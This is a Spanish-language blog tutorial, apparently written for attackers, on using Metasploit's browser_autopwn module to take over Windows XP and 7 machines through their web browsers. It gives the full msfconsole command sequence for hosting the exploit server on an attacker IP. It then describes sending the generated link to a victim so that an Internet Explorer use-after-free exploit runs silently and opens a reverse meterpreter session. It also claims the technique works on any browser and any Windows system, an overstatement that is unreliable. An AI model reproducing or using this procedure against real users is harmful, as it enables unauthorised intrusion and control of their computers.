En esta pequeña entrada se describirá como utilizar el modulo browser_autopwn incluida en el Metasploit, la cual nos permitirá explotar cualquier tipo de vulnerabilidad que afecten a los navegadores webs, obteniendo asi una session meterpreter en el sistema vulnerable.
Metasploit ofrece la posibilidad de lanzar exploits de acuerdo a la versión del browser que la victima este utilizando, por ejemplo cuando utilizemos el modulo browser_autopwn esta buscara todos los exploits respectivos para cualquier tipo de navegador, ya sea Internet Explorer, Google Chorme, Firefox u Opera, de manera que cuando la victima ejecute el link generado, esta automaticamente se aproveche de la vulnerabilidad encontrada.
Por otro lado, para acceder a cualquier Sistema Windows 7 o XP nos basaremos en la ultima vulnerabilidad 0-day que se registro en el Navegador Internet Explorer versiones 7 - 8 y 9 la cual permite que cualquier 'atacante' puede utilizar el exploit respectivo para tomar acceso completo al sistema.
Veamos un poco mas detallado el trabajo que realiza el modulo browser_autopwn para apoderarse de una forma rápida y fácil de cualquier sistema Windows.
REQUERIMIENTOS:
Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 (Victima)
PROCEDIMIENTO DEL ATAQUE:
Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:
------------------------------------------------------------------------
use auxiliary/server/browser_autopwn (Usar el modulo browser_autopwn)
set lhost 192.168.1.17 (IP del Atacante)
set srvhost 192.168.1.17 (IP del Atacante)
set uripath / (Path del link a enviar)
set srvport 80 (Puerto)
exploit
------------------------------------------------------------------------
Después de ejecutar el comando exploit, browser_autopwn empezara a buscar todos los exploits que pueda afectar a cualquier Navegador Web, ya sea en las vulnerabilidades de Java, Flash Player, WinZip, Apple Quick Time y unos cuantos mas, siempre y cuando tengamos el MSF actualizado.
Luego que la herramienta termine de 'buscar' todos los exploits que afecten a los navegadores, esta mostrara cuantos exploits ha encontrado y generara un link la cual sera enviada a la victima, como se aprecia en la imagen siguiente:
Como se aprecia en la imagen, browser_autopwn encontró 39 exploits y genero una URL http://192.168.1.17:80/ la misma que sera enviada a la victima para que lo ejecute desde su navegador, de tal manera que esta URL pueda ejecutar cualquier exploit en forma silenciosa y generar la conexion inversa.
Para tal caso, he ejecutado dicha URL en un Sistema Windows XP con Internet Explorer 7, de tal forma quebrowser_autopwn pueda ejecutar el exploit respectivo para el Navegador, la cual si logra ejecutarse sin problema alguno, esta devolverá una session meterpreter, como se aprecia en la imagen siguiente:
Claramente se aprecia la forma en que trabaja browser_autopwn ya que la URL se ejecuto en un Navegador Internet Explorer, entonces esta inmediatamente ejecuto el ultimo exploit ie_execcommand_uaf de tal forma que el sistema quedo totalmente VULNERADO!
Seguidamente, podemos utilizar los comandos respectivos para mostrar la información total del sistema y algunos que otros comandos que se requiera dependiendo de lo que deseemos hacer en dicho sistema.
Como mencione lineas arriba, esto puede funcionar en cualquier Navegador Web y cualquier Sistema Operativo Windows, solo basta con tener nuestro MSF totalmente actualizado y estar al tanto de las ultimas vulnerabilidades que pueden afectar a los mismos!